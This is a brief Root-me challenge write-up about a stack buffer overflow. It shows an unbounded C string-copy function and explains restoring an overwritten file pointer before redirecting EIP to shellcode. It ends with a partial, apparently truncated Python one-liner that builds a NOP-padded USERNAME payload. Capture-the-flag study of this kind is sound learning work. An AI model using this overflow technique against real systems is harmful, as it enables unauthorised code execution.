Root-me
void cpstr(char *dst, const char *src) #the vulnerable function
{
for(; *src; src++, dst++)
{
*dst = *src;
}
*dst = 0;
}
OK this is clearly a simple buffer overflow the only problem was while overwriting stack we also overwrite file pointer which causes lil problem so we
have to restore it and then overwrite eip with our shellcode addr which is loaded via c code as seen in format bug 3 question and tht's it !!!
python -c 'import struct;print "USERNAME="+"\x90"*136+struct.pack(" /tmp/siva/imp